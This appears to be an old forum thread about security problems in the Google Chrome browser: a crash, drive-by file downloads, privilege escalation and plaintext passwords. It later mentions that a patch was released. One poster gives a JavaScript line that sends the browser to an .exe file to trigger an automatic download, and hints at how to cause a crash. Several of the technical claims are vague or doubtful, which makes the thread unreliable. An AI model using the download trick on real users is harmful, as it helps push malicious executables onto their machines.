FAO Chrome users

Since it was recently posted about on the .Org, I figured I'd update a few folks. The known issues with Chrome are:

- A known crash. (geeks, POP EBP when EIP=0x01002FF4 - very easy to do when you know how). The crash causes all tabs, and all executables associated with Chrome to close.
- A known exploit. Chrome is set to allow automatic file downloads, and this can be abused maliciously. These files can be stored anywhere on the computer.
- A way to achieve priviledge escalation, and effectively run code as the escalated user.
- The Chrome password store keeps passwords in PLAINTEXT. This combined with other issues above could provide an attacker will all passwords stored on a computer, with the site/server that they are associated.
- There is a buffer overflow exception when using the "Save As" dialog.

The instructions sent out by my company are that anyone found with Chrome installed on the PC, will be subject to disciplinary procedures.

[mister c]

Glad I've wiped mine off then. I was watching "Click" on the BBC on Saturday & Google are paying money to Firefox for development.
I tried Chrome & still found that it crashes the same as FF when trying to open .pdf files. I have to revert to IE when doing certain things at work as a lot of files I need to download are .pdf.

I'm still wondering if anyone will understand the EBP/EIP reference, and it's implications - or am I just too geeky? Oh, and googling is classed as cheating.

[mister c]

Quote:

Originally Posted by Baph

I'm still wondering if anyone will understand the EBP/EIP reference, and it's implications - or am I just too geeky? Oh, and googling is classed as cheating.

Yup.
What??????
Maybe
I Don't Know
Who.
Think that covers every eventuality


What on earth is EBP/EIP interface?????????

Every Birds Pants/Even In Paris?????????

Quote:

Originally Posted by mister c

Yup.
What??????
Maybe
I Don't Know
Who.
Think that covers every eventuality


What on earth is EBP/EIP interface?????????

Every Birds Pants/Even In Paris?????????

They're both registers in the CPU. Typically, the EBP is used to reference a stack frame, and the EIP is the current instruction within the stack (sort of an index).

When a procedure of code starts, you can tell, because EBP = ESP (another register).

That's not what I was getting at though, if someone on the .Org is geeky enough, my original post details HOW to make Chrome crash. I don't like revealing to all & sundry, because that crash is useful with some of the other problems in Chrome, and generally, if you know about the various registers in a CPU, you can't be bothered crashing someones browser to achieve GUID escalations.

A shame I don't use FF (have before though, not sure which version) and I much prefer the Chrome interface to IE. Are Google planning on patching this or just leaving it for people to fix (hence the open source)?

Quote:

Originally Posted by muffles

A shame I don't use FF (have before though, not sure which version) and I much prefer the Chrome interface to IE. Are Google planning on patching this or just leaving it for people to fix (hence the open source)?

From top to bottom, their intention is to fix 1, 3 & 5. 2 & 4 (automatic downloads & plaintext passwords) are a non-issue according to them.

Both are classed by Google as "features" not bugs.

Crikey, that's nice of them!!! You'll have to forgive my unfamiliarity with browser architecture (although I claim to work in IT) but the passwords, presumably these are just the ones where it always asks you if you want Chrome to save the password for you? If so, that's lucky, as I always click no anyway. Unless it has a problem with cookies too?

The automatic downloads sounds dodgy though is it completely hidden from the user? I've downloaded a couple of things but it's always asked me, same as a normal link, I am assuming they have another mechanism to do this?

Quote:

Originally Posted by muffles

Crikey, that's nice of them!!! You'll have to forgive my unfamiliarity with browser architecture (although I claim to work in IT) but the passwords, presumably these are just the ones where it always asks you if you want Chrome to save the password for you? If so, that's lucky, as I always click no anyway. Unless it has a problem with cookies too?

The automatic downloads sounds dodgy though is it completely hidden from the user? I've downloaded a couple of things but it's always asked me, same as a normal link, I am assuming they have another mechanism to do this?

Again, not giving much information out, but you work in IT, so...

The automatic downloads bug can be kicked off with the following:
window.setTimeout("location.href='http://localhost/1.exe'", 3000);

That's just plain nasty. Especially concidering that JavaScript could be used to execute 1.exe as well. The script can also specify where to save the file to, with the use of certain HTML headers. This can be ANYWHERE on your PC.

EDIT: Just found the specifics on the workaround for the automatic downloads. Apparently 149.29, released the day before yesterday resolves it.

The password saving, requires your permission to save passwords.

Cheers Baph! I don't know much JS but that's pseudocode enough for me to read - doesn't sound great. Off to download the latest version when I get in tonight